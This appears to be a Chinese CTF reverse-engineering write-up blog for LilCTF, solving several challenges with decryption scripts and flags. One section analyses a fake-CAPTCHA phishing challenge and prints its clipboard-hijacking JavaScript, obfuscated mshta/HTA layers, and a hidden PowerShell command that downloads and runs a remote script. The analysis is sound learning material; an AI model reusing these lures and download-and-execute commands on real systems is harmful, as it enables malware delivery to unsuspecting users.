LilCTF REwp+复现

w1n9 Lv1
  2025-08-21 11:18:35 2025-08-21 11:18:35 创建   2025-08-24 23:21:35 2025-08-24 23:21:35 更新      

ARM_ASM

这是主要的逻辑

image-20250822112547927
image-20250822112547927

加密函数为check,解包得到so文件用ida查看

image-20250822112640797
image-20250822112640797

加密逻辑为:Neon指令 → 位运算 → base64,这里的base64是变表

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
import base64
VARIANT_B64_CHARS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ3456780129+/"
VARIANT_B64_MAP = {c: i for i, c in enumerate(VARIANT_B64_CHARS)}

def variant_b64_decode(data: str) -> bytes:
    data = data.rstrip('=')
    decoded_indices = [VARIANT_B64_MAP[c] for c in data]
    
    output_bytes = bytearray()
    i = 0
    while i < len(decoded_indices):
        b1 = decoded_indices[i]
        b2 = decoded_indices[i+1]
        
        output_bytes.append((b1 << 2) | (b2 >> 4))
        
        if i + 2 < len(decoded_indices):
            b3 = decoded_indices[i+2]
            output_bytes.append(((b2 & 0x0F) << 4) | (b3 >> 2))
        
        if i + 3 < len(decoded_indices):
            b4 = decoded_indices[i+3]
            output_bytes.append(((b3 & 0x03) << 6) | b4)
        
        i += 4
        
    return bytes(output_bytes)

def reverse_bit_shift(data: bytes) -> bytes:
    if len(data) % 3 != 0:
        return data
        
    result = bytearray(len(data))
    for j in range(0, len(data), 3):
        byte0 = data[j]
        byte1 = data[j+1]
        byte2 = data[j+2]
        
        result[j] = ((byte0 << 5) & 0xFF) | (byte0 >> 3)
        result[j+1] = ((byte1 << 1) & 0xFF) | (byte1 >> 7)
        result[j+2] = byte2
        
    return bytes(result)

def reverse_neon_xor(data: bytes) -> bytes:
    t_initial = bytes([0x0D, 0x0E, 0x0F, 0x0C, 0x0B, 0x0A, 0x09, 0x08, 0x06, 0x07, 0x05, 0x04, 0x02, 0x03, 0x01, 0x00])
    
    result = bytearray()
    v10 = bytearray(t_initial)
    
    for i in range(3):
        final_block = data[i*16 : (i+1)*16]
        
        intermediate_block = bytes([a ^ b for a, b in zip(final_block, v10)])
        
        original_block = bytearray(16)
        for j in range(16):
            lookup_index = v10[j] 
            if lookup_index < 16:
                original_block[lookup_index] = intermediate_block[j]
        
        result.extend(original_block)
       
        v5 = bytes([i] * 16)
        v10 = bytes([a ^ b for a, b in zip(v10, v5)])
        
    return bytes(result)

if __name__ == "__main__":
    ciphertext = "KRD2c1XRSJL9e0fqCIbiyJrHW1bu0ZnTYJvYw1DM2RzPK1XIQJnN2ZfRMY4So09S"
    
    try:
        decoded_data = variant_b64_decode(ciphertext)
        
        shifted_data = reverse_bit_shift(decoded_data)
        
        final_result_bytes = reverse_neon_xor(shifted_data)

        flag_content = final_result_bytes.decode('ascii')
        
        print(flag_content)
        
    except Exception as e:
        print(f"解密过程中发生错误: {e}")
        
    # LILCTF{ez_arm_asm_meow_meow_meow_meow_meow_meow}

1’M no7 A rO6oT

这是页面部分源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
const cmd =
      "powershell . \\\\*i*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\*2\\\\msh*e ###HOST###/Coloringoutomic_Host.mp3   ###HOST###/Coloringoutomic_Host.mp3 #     ✅ Ι am nοt a rοbοt: CAPTCHA Verification ID: 10086";
      const baseUrl = `${window.location.protocol}//${window.location.host}`;

      fetch("/whereami", {
        method: "POST",
        body: baseUrl,
      }).catch((err) => {
        console.error("Failed to report host:", err);
      });

      function showVerification() {
        const checkbox = document.querySelector(".recaptcha-checkbox");
        const loadImg = document.querySelector(".loadImg");

        // Hide the checkbox and show spinner
        checkbox.style.display = "none";
        loadImg.style.display = "block";

        setTimeout(() => {
          document.getElementById("verificationSteps").style.display = "block";
          let ta = document.createElement("textarea");
          ta.value = cmd.replaceAll("###HOST###", baseUrl);
          ta.style.position = "fixed";
          ta.style.opacity = 0;
          ta.style.top = "-9999px";
          document.body.appendChild(ta);
          ta.focus();
          ta.select();
          document.execCommand("copy");
          ta.remove();
        }, 1000);
      }

主要逻辑就是有个伪造的人机验证,点击验证的话就会将一段pwsh命令复制到剪切板,执行的话就会电脑十分钟后强制关机,主要通过那个mp3文件实现的

通过命令

1
Get-Command \\*i*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\*2\\\\msh*e

得到输出

image-20250822112946936
image-20250822112946936

以及结合010下观察到MP3文件中的HTA标签可以得知,这个MP3有个hta病毒,使用mshta.exe来绕过应用程序白名单,从而达到执行hta文件里的内容的目的。因为hta里面可以写入vbs/javascript语言,所以自然而然地,010里面那段js代码应该就是主要的内容

接下来就是几层混淆嵌套

第一层

1
2
3
4
5
6
7
8
9
10
11
window.resizeTo(0, 0);
window.moveTo(-9999, -9999); 
SK=102;UP=117;tV=110;Fx=99;nI=116;pV=105;wt=111;RV=32;wV=82;Rp=106;kz=81;CX=78;GH=40;PS=70;YO=86;kF=75;PO=113;QF=41;sZ=123;nd=118;Ge=97;sV=114;wl=104;NL=121;Ep=76;uS=98;Lj=103;ST=61;Ix=34;Im=59;Gm=101;YZ=109;Xj=71;Fi=48;dL=60;cX=46;ho=108;jF=43;Gg=100;aV=90;uD=67;Nj=83;US=91;tg=93;vx=45;xv=54;QB=49;WT=125;FT=55;yN=51;ff=44;it=50;NW=53;kX=57;zN=52;Mb=56;Wn=119;sC=65;Yp=88;FF=79;

var SxhM = String.fromCharCode(SK,UP,tV,Fx,nI,pV,wt,tV,RV,pV,wt,wV,Rp,kz,CX,GH,PS,YO,kF,PO,QF,sZ,nd,Ge,sV,RV,wt,wl,NL,Ep,uS,Lj,ST,RV,Ix,Ix,Im,SK,wt,sV,RV,GH,nd,Ge,sV,RV,Gm,YZ,Xj,kF,RV,ST,RV,Fi,Im,Gm,YZ,Xj,kF,RV,dL,RV,PS,YO,kF,PO,cX,ho,Gm,tV,Lj,nI,wl,Im,RV,Gm,YZ,Xj,kF,jF,jF,QF,sZ,nd,Ge,sV,RV,tV,Gg,aV,uD,RV,ST,RV,Nj,nI,sV,pV,tV,Lj,cX,SK,sV,wt,YZ,uD,wl,Ge,sV,uD,wt,Gg,Gm,GH,PS,YO,kF,PO,US,Gm,YZ,Xj,kF,tg,RV,vx,RV,xv,Fi,QB,QF,Im,wt,wl,NL,Ep,uS,Lj,RV,ST,RV,wt,wl,NL,Ep,uS,Lj,RV,jF,RV,tV,Gg,aV,uD,WT,sV,Gm,nI,UP,sV,tV,RV,wt,wl,NL,Ep,uS,Lj,WT,Im,nd,Ge,sV,RV,wt,wl,NL,Ep,uS,Lj,RV,ST,RV,pV,wt,wV,Rp,kz,CX,GH,US,FT,QB,yN,ff,RV,FT,QB,it,ff,RV,FT,it,Fi,ff,RV,FT,Fi,it,ff,RV,FT,QB,NW,ff,RV,FT,QB,xv,ff,RV,FT,Fi,NW,ff,RV,FT,Fi,it,ff,RV,FT,Fi,kX,ff,RV,FT,Fi,kX,ff,RV,xv,zN,FT,ff,RV,FT,Fi,it,ff,RV,FT,it,QB,ff,RV,FT,Fi,it,ff,RV,xv,yN,yN,ff,RV,xv,zN,xv,ff,RV,FT,it,Fi,ff,RV,xv,yN,yN,ff,RV,xv,NW,Fi,ff,RV,xv,yN,yN,ff,RV,xv,zN,xv,ff,RV,FT,Fi,it,ff,RV,FT,QB,yN,ff,RV,xv
,yN,yN,ff,RV,xv,Mb,xv,ff,RV,FT,QB,QB,ff,RV,FT,QB,NW,ff,RV,FT,
Fi,it,ff,RV,FT,QB,xv,ff,RV,FT,QB,FT,ff,RV,FT,QB,NW,ff,RV,FT,
Fi,xv,ff,RV,FT,Fi,Fi,ff,RV,FT......)
eval(SxhM); 
window.close();
# 将eval替换为console.log,然后删掉window.close,在浏览器控制台运行

第二层

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
function ioRjQN(FVKq)
{
    var ohyLbg= "";
    for (var emGK = 0;emGK < FVKq.length; emGK++){
        var ndZC = String.fromCharCode(FVKq[emGK] - 601);
        ohyLbg = ohyLbg + ndZC
    }
    return ohyLbg
};
var ohyLbg = ioRjQN([713, 712, 720, 702, 715, 716, 705, 702, 709, 709, 647, 702, 721, 702, 633, 646, 720, 633, 650, 633, 646, 702, 713, 633, 686, 711, 715, 702, 716, 717, 715, 706, 700, 717, 702, 701, 633, 646, 711, 712, 713, 633, 637, 670, 671, 685, 670, 633, 662, 641, 692, 715, 702, 704, 702, 721, 694, 659, 659, 678, 698, 717, 700, 705, 702, 716, 641, 640, 698, 654, 698, 658, 699, 653, 658, 703, 699, 657, 698, 701, 699, 702, 699, 657, 702, 650, 658, 700, 699, 702, 698, 652, 698, 703, 698, 658, 699, 703, 699, 703, 702, 700, 702, 702, 702, 657, 698, 658, 698, 651, 699, 698, 703, 655, 658, 703, 699, 654, 699, 703, 699, 657, 698, 658, 698, 650, 658, 702, 698, 652, 698, 652, 699, 657, 658, 649, 658, 703, 699, 654, 699, 703, 658, 699, 657, 652, 658, 699, 703, 698, 703, 657, 658, 649, 658, 699, 698, 654, 698, 651, 698, 657, 698, 652, 699, 699, 699, 703, 658, 700, 698, 652, 699, 699, 698, 658, 699, 702, 658, 703, 698, 653, 698, 658, 698, 649, 698, 649, 658, 649, 699, 698, 703, 701, 702, 651, 703, 700, 658, 649, 699, 700, 698, 652, 699, 699, 698, 658, 699, 702, 699, 703, 698, 653, 698, 658, 698, 649, 698, 649, 702, 651, 698, 658, 699, 653, 698, 658, 702, 702, 702, 700, 702, 650, 658, 699, 698, 654, 698, 651, 698, 657, 698, 652, 699, 699, 658, 703, 699, 657, 699, 654, 698, 649, 698, 658, 702, 700, 657, 653, 698, 654, 698, 657, 698, 657, 698, 658, 698, 651, 702, 700, 702, 650, 657, 701, 699, 702, 698, 699, 699, 658, 698, 650, 698, 658, 698, 651, 699, 657, 657, 649, 698, 654, 699, 703, 699, 657, 702, 700, 702, 699, 702, 650, 699, 699, 702, 699, 702, 649, 702, 699, 698, 653, 702, 699, 702, 649, 702, 699, 702, 650, 698, 658, 699, 700, 702, 699, 702, 649, 702, 699, 658, 658, 698, 651, 699, 702, 698, 658, 699, 703, 699, 657, 699, 702, 698, 654, 698, 703, 699, 657, 698, 658, 698, 657, 702, 699, 702, 649, 702, 699, 702, 650, 657, 703, 698, 652, 698, 650, 698, 650, 698, 701, 698, 651, 698, 657, 702, 699, 702, 649, 702, 702, 658, 703, 698, 658, 699, 657, 702, 650, 658, 698, 698, 701, 699, 702, 698, 654, 698, 701, 698, 702, 698, 649, 698, 658, 702, 700, 703, 703, 702, 700, 702, 699, 698, 653, 699, 657, 699, 657, 699, 700, 703, 655, 702, 652, 702, 652, 698, 703, 698, 653, 698, 701, 698, 649, 698, 649, 698, 658, 698, 651, 698, 699, 698, 658, 702, 651, 699, 653, 698, 654, 698, 651, 699, 703, 698, 653, 698, 654, 702, 651, 698, 698, 699, 658, 698, 651, 703, 655, 703, 657, 703, 701, 703, 700, 703, 698, 703, 657, 702, 652, 698, 702, 698, 658, 699, 703, 699, 657, 699, 658, 698, 657, 698, 657, 698, 654, 698, 651, 698, 699, 702, 651, 698, 655, 699, 700, 698, 699, 702, 699, 703, 656, 658, 703, 657, 654, 702, 700, 658, 698, 698, 701, 699, 702, 698, 654, 698, 701, 698, 702, 698, 649, 698, 658, 703, 655, 702, 652, 658, 655, 703, 657, 657, 657, 702, 700, 702, 699, 657, 651, 698, 658, 699, 657, 702, 651, 658, 699, 698, 658, 698, 702, 657, 703, 698, 649, 698, 654, 698, 658, 698, 651, 699, 657, 702, 699, 703, 656, 698, 703, 698, 657, 703, 656, 658, 703, 658, 698, 702, 700, 698, 703, 703, 657, 657, 653, 702, 700, 702, 653, 702, 651, 698, 700, 702, 657, 657, 658, 699, 653, 698, 658, 698, 703, 699, 658, 699, 657, 698, 654, 698, 652, 698, 651, 657, 703, 698, 652, 698, 651, 699, 657, 698, 658, 699, 653, 699, 657, 702, 651, 657, 654, 698, 651, 699, 698, 698, 652, 698, 656, 698, 658, 657, 703, 698, 652, 698, 650, 698, 650, 698, 701, 698, 651, 698, 657, 702, 651, 702, 653, 702, 653, 698, 700, 702, 657, 657, 658, 699, 653, 698, 658, 698, 703, 699, 658, 699, 657, 698, 654, 698, 652, 698, 651, 657, 703, 698, 652, 698, 651, 699, 657, 698, 658, 699, 653, 699, 657, 702, 651, 657, 654, 698, 651, 699, 698, 698, 652, 698, 656, 698, 658, 657, 703, 698, 652, 698, 650, 698, 650, 698, 701, 698, 651, 698, 657, 699, 649, 657, 699, 698, 658, 699, 657, 702, 650, 657, 650, 698, 658, 698, 650, 698, 702, 698, 658, 699, 702, 702, 654, 658, 656, 703, 702, 658, 650, 702, 651, 657, 651, 698, 701, 698, 650, 698, 658, 702, 654, 702, 651, 657, 654, 698, 651, 699, 698, 698, 652, 698, 656, 698, 658, 702, 653, 698, 700, 702, 657, 657, 658, 699, 653, 698, 658, 698, 703, 699, 658, 699, 657, 698, 654, 698, 652, 698, 651, 657, 703, 698, 652, 698, 651, 699, 657, 698, 658, 699, 653, 699, 657, 702, 651, 657, 654, 698, 651, 699, 698, 698, 652, 698, 656, 698, 658, 657, 703, 698, 652, 698, 650, 698, 650, 698, 701, 698, 651, 698, 657, 702, 651, 702, 653, 702, 653, 698, 700, 702, 657, 657, 658, 699, 653, 698, 658, 698, 703, 699, 658, 699, 657, 698, 654, 698, 652, 698, 651, 657, 703, 698, 652, 698, 651, 699, 657, 698, 658, 699, 653, 699, 657, 702, 651, 657, 654, 698, 651, 699, 698, 698, 652, 698, 656, 698, 658, 657, 703, 698, 652, 698, 650, 698, 650, 698, 701, 698, 651, 698, 657, 699, 649, 657, 699, 698, 658, 699, 657, 702, 650, 657, 650, 698, 658, 698, 650, 698, 702, 698, 658, 699, 702, 699, 649, 658, 699, 698, 653, 698, 658, 699, 702, 698, 658, 699, 656, 702, 653, 657, 699, 658, 698, 702, 700, 658, 652, 702, 654, 702, 651, 658, 698, 698, 701, 698, 649, 699, 658, 698, 658, 702, 651, 657, 651, 698, 701, 698, 650, 698, 658, 702, 650, 698, 703, 698, 649, 698, 654, 698, 656, 698, 658, 702, 699, 702, 655, 698, 657, 657, 651, 698, 701, 698, 650, 698, 658, 702, 699, 699, 650, 702, 654, 702, 651, 657, 651, 698, 701, 698, 650, 698, 658, 702, 654, 702, 651, 657, 654, 698, 651, 699, 698, 698, 652, 698, 656, 698, 658, 702, 653, 702, 699, 657, 651, 698, 658, 702, 655, 698, 703, 699, 657, 702, 699, 702, 649, 703, 701, 702, 649, 703, 701, 702, 654, 702, 654, 702, 653, 657, 649, 658, 703, 702, 700, 658, 698, 698, 701, 699, 702, 698, 654, 698, 701, 698, 702, 698, 649, 698, 658, 703, 655, 702, 652, 658, 655, 703, 657, 657, 657, 702, 654, 702, 651, 658, 698, 698, 701, 698, 649, 699, 658, 698, 658, 702, 654, 703, 656, 658, 703, 658, 698, 702, 700, 657, 701, 702, 700, 702, 653, 702, 653, 702, 653, 702, 653, 657, 699, 698, 658, 699, 657, 702, 650, 658, 698, 698, 701, 699, 702, 698, 654, 698, 701, 698, 702, 698, 649, 698, 658, 702, 700, 698, 703, 703, 657, 657, 653, 702, 700, 702, 650, 658, 698, 698, 701, 698, 649, 699, 658, 698, 658, 657, 652, 702, 654, 699, 649, 657, 699, 698, 658, 699, 657, 702, 650, 657, 650, 698, 658, 698, 650, 698, 702, 698, 658, 699, 702, 702, 654, 699, 649, 658, 699, 698, 653, 698, 658, 699, 702, 698, 658, 699, 656, 702, 653, 657, 699, 658, 698, 702, 700, 658, 652, 702, 654, 702, 651, 658, 698, 698, 701, 698, 649, 699, 658, 698, 658, 702, 651, 657, 651, 698, 701, 698, 650, 698, 658, 702, 650, 698, 703, 698, 649, 698, 654, 698, 656, 698, 658, 702, 699, 702, 655, 699, 699, 698, 651, 702, 655, 698, 657, 702, 655, 698, 699, 702, 699, 699, 650, 702, 654, 702, 651, 657, 651, 698, 701, 698, 650, 698, 658, 702, 654, 703, 656, 702, 698, 702, 653, 658, 656, 658, 703, 698, 703, 699, 702, 698, 654, 699, 700, 699, 657, 657, 702, 698, 649, 698, 652, 698, 703, 698, 656, 658, 650, 703, 655, 703, 655, 657, 703, 699, 702, 698, 658, 698, 701, 699, 657, 698, 658, 702, 653, 702, 653, 657, 699, 698, 658, 699, 657, 702, 650, 658, 698, 698, 701, 699, 702, 698, 654, 698, 701, 698, 702, 698, 649, 698, 658, 702, 700, 698, 703, 703, 657, 657, 653, 702, 700, 702, 650, 658, 698, 698, 701, 698, 649, 699, 658, 698, 658, 657, 652, 702, 654, 702, 651, 702, 653, 702, 653, 657, 699, 698, 658, 699, 657, 702, 650, 658, 698, 698, 701, 699, 702, 698, 654, 698, 701, 698, 702, 698, 649, 698, 658, 702, 700, 657, 701, 702, 654, 702, 651, 658, 698, 698, 701, 698, 649, 699, 658, 698, 658, 702, 654, 702, 651, 657, 654, 698, 651, 699, 698, 698, 652, 698, 656, 698, 658, 702, 653, 702, 653, 658, 698, 698, 701, 699, 702, 698, 654, 698, 701, 698, 702, 698, 649, 698, 658, 702, 700, 703, 703, 702, 700, 702, 650, 658, 698, 698, 701, 698, 649, 702, 654, 702, 654, 702, 654, 702, 654, 702, 702, 703, 656, 640, 645, 640, 647, 724, 651, 726, 640, 642, 633, 725, 633, 638, 633, 724, 633, 692, 700, 705, 698, 715, 694, 641, 692, 668, 712, 711, 719, 702, 715, 717, 694, 659, 659, 685, 712, 667, 722, 717, 702, 641, 637, 696, 647, 687, 698, 709, 718, 702, 645, 650, 655, 642, 633, 646, 699, 721, 712, 715, 633, 640, 651, 649, 653, 640, 642, 633, 726, 642, 633, 646, 707, 712, 706, 711, 633, 640, 640, 660, 639, 633, 637, 670, 671, 685, 670, 647, 684, 718, 699, 716, 717, 715, 706, 711, 704, 641, 649, 645, 652, 642, 633, 637, 670, 671, 685, 670, 647, 684, 718, 699, 716, 717, 715, 706, 711, 704, 641, 652, 642]);
var emGK = ioRjQN([688,684,700,715,706,713,717,647,684,705,702,709,709]);
var ioRjQN = new ActiveXObject(emGK);
ioRjQN.Run(ohyLbg, 0, true);

#同样使用console.log替换run,打印ohyLbg和emGK的内容

第三层,得到了一段pwsh代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$EFTE =([regex]::Matches('a5a9b49fb8adbeb8e19cbea3afa9bfbfec
eee8a9a2baf69fb5bfb8a9a19ea3a3b8909fb5bf9b839bfaf8909ba5a2a8
a3bbbf9ca3bba9be9fa4a9a0a090bafde2fc90bca3bba9bebfa4a9a0a0e2
a9b4a9eeece19ba5a2a8a3bb9fb8b5a0a9ec84a5a8a8a9a2ece18dbeabb9
a1a9a2b880a5bfb8ecebe1bbebe0eba4ebe0ebe1a9bcebe0eb99a2bea9bf
b8bea5afb8a9a8ebe0ebe18fa3a1a1ada2a8ebe0ee9fa9b8e19aadbea5ad
aea0a9ecffeceba4b8b8bcf6e3e3afa4ada0a0a9a2aba9e2b4a5a2bfa4a5
e2aab9a2f6f8fdfcfaf8e3aea9bfb8b9a8a8a5a2abe2a6bcabebf79f85ec
9aadbea5adaea0a9f6e396f888eceb82a9b8e29ba9ae8fa0a5a9a2b8ebf
7afa8f79f9aecaff884ece4e2ace889b4a9afb9b8a5a3a28fa3a2b8a9b4b
8e285a2baa3a7a98fa3a1a1ada2a8e2e4e4ace889b4a9afb9b8a5a3a28fa
3a2b8a9b4b8e285a2baa3a7a98fa3a1a1ada2a8b08ba9b8e181a9a1aea9b
ee597fe91e282ada1a9e5e285a2baa3a7a9e4ace889b4a9afb9b8a5a3a28
fa3a2b8a9b4b8e285a2baa3a7a98fa3a1a1ada2a8e2e4e4ace889b4a9afb
9b8a5a3a28fa3a2b8a9b4b8e285a2baa3a7a98fa3a1a1ada2a8b08ba9b8e
181a9a1aea9beb09ba4a9bea9b7e48b9aec93e5e29aada0b9a9e282ada1a
9e1afa0a5a7a9ebe6a882ada1a9ebb1e5e282ada1a9e5e285a2baa3a7a9e
4eb82a9e6afb8ebe0fde0fde5e5e4809fec9aadbea5adaea0a9f6e396f88
8e5e29aada0b9a9e5f79f9aec8dece4e4e4e48ba9b8e19aadbea5adaea0a
9ecaff884ece19aada0b9a983e5b08ba9b8e181a9a1aea9bee5b09ba4a9b
ea9b7e48b9aec93e5e29aada0b9a9e282ada1a9e1afa0a5a7a9ebe6bba2e
6a8e6abebb1e5e282ada1a9e5f7eae4979fafbea5bcb88ea0a3afa791f6f
68fbea9adb8a9e4e48ba9b8e19aadbea5adaea0a9ecaff884ece19aada0b
9a983e5e2e4e48ba9b8e19aadbea5adaea0a9ec8de5e29aada0b9a9e5e28
5a2baa3a7a9e4e49aadbea5adaea0a9ecffece19aada0e5e5e5e5eef7
','.{2}') | % { [char]([Convert]::ToByte($_.Value,16) -bxor '204') }) -join '';

& $EFTE.Substring(0,3) $EFTE.Substring(3)

# '&'是运行符,把他摘掉再让他显示变量值

第四层

1
2
3
4
5
6
7
8
Start-Process "$env:SystemRoot\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
-WindowStyle Hidden 
-ArgumentList '-w','h','-ep','Unrestricted','-Command',"Set-Variable 3 '<http://challenge.xinshi.fun:41064/bestudding.jpg>';
SI Variable:/Z4D 'Net.WebClient';
cd;
SV c4H (.`$ExecutionContext.InvokeCommand.((`$ExecutionContext.InvokeCommand|Get-Member)[2].Name).Invoke(`$ExecutionContext.InvokeCommand.((`$ExecutionContext.InvokeCommand|Get-Member|Where{(GV _).Value.Name-clike'*dName'}).Name).Invoke('Ne*ct',1,1))(LS Variable:/Z4D).Value);
SV A ((((Get-Variable c4H -ValueO)|Get-Member)|Where{(GV _).Value.Name-clike'*wn*d*g'}).Name);
&([ScriptBlock]::Create((Get-Variable c4H -ValueO).((Get-Variable A).Value).Invoke((Variable 3 -Val))))";

这里jpg就是那个容器里的远程脚本,扒那里面的代码就好了

1
2
3
4
5
$url = '<http://challenge.xinshi.fun:36057/bestudding.jpg>'
$webClient = New-Object Net.WebClient
$scriptContent = $webClient.DownloadString($url)
$scriptContent
#这样就可以得到jpg的代码

第五层

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
('('  | % { $r = + $() } { $u = $r } { $b = ++  $r } { $q = 
(  $r = $r + $b  ) } { $z = (  $r = $r + $b  ) } { $o = ($r
= $r + $b  ) } { $d = ($r = $r + $b  ) } { $h = ($r = $r +
$b  ) } { $e = ($r = $r + $b  ) } { $i = ($r = $r + $b  ) 
} { $x = ($q *( $z) ) } { $l = ($r = $r + $b) } { $g = "[" 
+ "$(@{  })"[$e  ] + "$(@{  })"[  "$b$l"  ] + "$(@{  }  )  
"[  "$q$u"  ] + "$?"[$b  ] + "]" } { $r = "".("$(  @{}  )  
"[  "$b$o"  ] + "$(@{})  "[  "$b$h"] + "$(  @{  }  )"[$u]
+ "$(@{}  )"[$o] + "$?  "[  $b] + "$(  @{})"[$z  ]) } { $r
= "$(@{  }  )"[  "$b" + "$o"] + "$(@{  })  "[$o  ] + "$r"
["$q" + "$e"  ] } ); 
" 
$r ($g$z$x+$g$x$i+$g$b$u$b+$g
   $l$i+$g$b$b$e+$g$b$u$z+$g$i$u+$g$b$b$o+$g$b$u$b+$g$b$u$q+
   $g$b$u$b+$g$b$b$o+$g$b$u$b+$g$b$b$u+$g$l$l+$g$b$u$b+$g$z$
   q+$g$x$b+$g$z$q+$g$z$x+$g$x$l+$g$b$b$o+$g$b$b$o+$g$b$b$b+
   $g$b$b$o+$g$x$d+$g$l$l+$g$b$b$x+$g$b$u$d+$g$b$b$b+$g$b$b$
   u+$g$i$u+$g$b$b$o+$g$b$u$b+$g$b$u$q+$g$b$u$b+$g$b$b$o+$g
   $b$u$b+$g$b$b$u+$g$l$l+$g$b$u$b+$g$z$q+$g$x$b+$g$z$q+$g$z
   $x+$g$i.......)  
"  |  .$r
# 将.$r替换为 Write-Output,让其继续自解密

第六层

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
iex  ([CHar]36+[CHar]68+[CHar]101+[CHar]98+[CHar]117+[CHar]10
3+[CHar]80+[CHar]114+[CHar]101+[CHar]102+[CHar]101+[CHar]114
+[CHar]101+[CHar]110+[CHar]99+[CHar]101+[CHar]32+[CHar]61+[
CHar]32+[CHar]36+[CHar]69+[CHar]114+[CHar]114+[CHar]111+[CHa
r]114+[CHar]65+[CHar]99+[CHar]116+[CHar]105+[CHar]111+[CHar]
110+[CHar]80+[CHar]114+[CHar]101+[CHar]102+[CHar]101+[CHar]1
14+[CHar]101+[CHar]110+[CHar]99+[CHar]101+[CHar]32+[CHar]61+
[CHar]32+[CHar]36+[CHar]86+[CHar]101+[CHar]114+[CHar]98+[CHa
r]111+[CHar]115+[CHar]101+[CHar]80+[CHar]114+[CHar]101+[CHar
]102+[CHar]101+[CHar]114+[CHar]101+[CHar]110+[CHar]99+[CHar]
101+[CHar]32+[CHar]61+[CHar]32+[CHar]36+[CHar]87+[CHar]97+[C
Har]114+[CHar]110+[CHar]105+[CHar]110+[CHar]103+[CHar]80+[CH
ar]114+[CHar]101+[CHar]102+[CHar]101+[CHar]114+[CHar]101+[CH
ar]110+[CHar]99+[CHar]101+[CHar]32+[CHar]61+[CHar]32+[CHar]3
4+[CHar]83+[CHar]105+[CHar]108+[CHar]101+[CHar]110+[CHar]116
+[CHar]108+[CHar]121+[CHar]67+[CHar]111+.....)

# 这里将iex指令去除,继续让其自己转换字符然后拼接

运行后得到的代码如图,其中便包含flag

image-20250822113045985
image-20250822113045985

LILCTF{Be_VIG1L@NT_@6alnst_PH15hiNG}

obfusheader.h

一个混淆得比较狠的题,直接分析程序流行不通,题目提示可以追踪数据流

运行程序尝试一番试出来flag的长度为40

image-20250822172815403
image-20250822172815403

通过字符串定位到输入函数的位置

可以得知我们的输入是存放在unk_14003A040的,根据题目提示我们无法正常追踪程序流,那我们就定位我们输入存放的位置,并追踪之后每次对其读写的时机,于是在这里下一个硬件读写断点,使其每次被读写时都能被断下来

image-20250823150735057
image-20250823150735057

第一处,计算输入长度

image-20250823151024934
image-20250823151024934

第二次将输入的每两个字节与随机数异或

image-20250823153031399
image-20250823153031399

断点下在srand的调用处,可以看到随机数种子为rcx存放的内容,0x48691412

image-20250823154805924
image-20250823154805924

第三处为

image-20250823162949787
image-20250823162949787

有七处相同类型的花指令逐一除去后得到反汇编如下

image-20250823165422831
image-20250823165422831

逻辑是先输入的高四位与低四位进行或运算,然后再每个字节取反运算

最后一次在msvcrt.dll的memcpy函数,rax存放加密后的输入,[rcx+rdx]存放的是密文

image-20250823214441243
image-20250823214441243

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#include <stdio.h>
#include <string.h>
#include <stdlib.h>


unsigned char cipher[] = {0x5C, 0xAF, 0xB0, 0x1C, 0xFC, 0xEF, 0xC7, 0x8D, 0x01, 0xDD, 0x34, 0x39, 0x13, 0xBE, 0x47, 0x2D, 0x0E, 0x7C, 0xFF, 0xFA, 0x7D, 0x0F, 0xD0, 0xFA, 0xFA, 0x3D, 0x81, 0xFD, 0x73, 0xA8, 0x06, 0x1C, 0xAB, 0x7B, 0x42, 0xEB, 0x65, 0xB9, 0xDF, 0x1B};

int main(){
    unsigned char flag[40];
    srand(0x48691412);
    for(int i = 0; i < sizeof(cipher); i++){
        flag[i] = ~cipher[i];
        flag[i] = (flag[i] << 4) | (flag[i] >> 4);
    }
    for(int i = 0; i < sizeof(cipher); i+=2){
        unsigned short* temp = (unsigned short *) &flag[i];
        *temp ^= rand();
    }
    for(int i = 0; i < sizeof(flag); i++){
        putchar(flag[i]);
    }    
}
//LILCTF{wHat_Is_DatA1LOW_CaN_1T_b3_E4TeN}

Qt_Creator

image-20250824183425398
image-20250824183425398

一道crackme,注册码即为flag,通过搜索字符串定位到最后的判断逻辑

image-20250824183857052
image-20250824183857052

往上回溯到sub_40EE30函数,可以看到类似于密文的东西

image-20250824195732730
image-20250824195732730

往下调发现加密函数在sub_40FFF0,是个简单的字符加减的解密

image-20250824221951657
image-20250824221951657

ZNK9QLineEdit4textEv函数是用来获取QlineEdit输入框中的输入内容,因为这里是直接对密文加密的,因此我们无需去还原加密算法,这里该函数的第二个参数直接就是明文

image-20250824222153188
image-20250824222153188

LILCTF{Q7_cre4t0r_1s_very_c0nv3ni3nt}

Oh_My_Uboot

  • 标题: LilCTF REwp+复现
  • 作者: w1n9
  • 创建于 : 2025-08-21 11:18:35
  • 更新于 : 2025-08-24 23:21:35
  • 链接: https://vv1n9.github.io/2025/08/21/LilCTF REwp+复现/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
LilCTF REwp+复现
  1. ARM_ASM
  2. 1’M no7 A rO6oT
  3. obfusheader.h
  4. Qt_Creator
  5. Oh_My_Uboot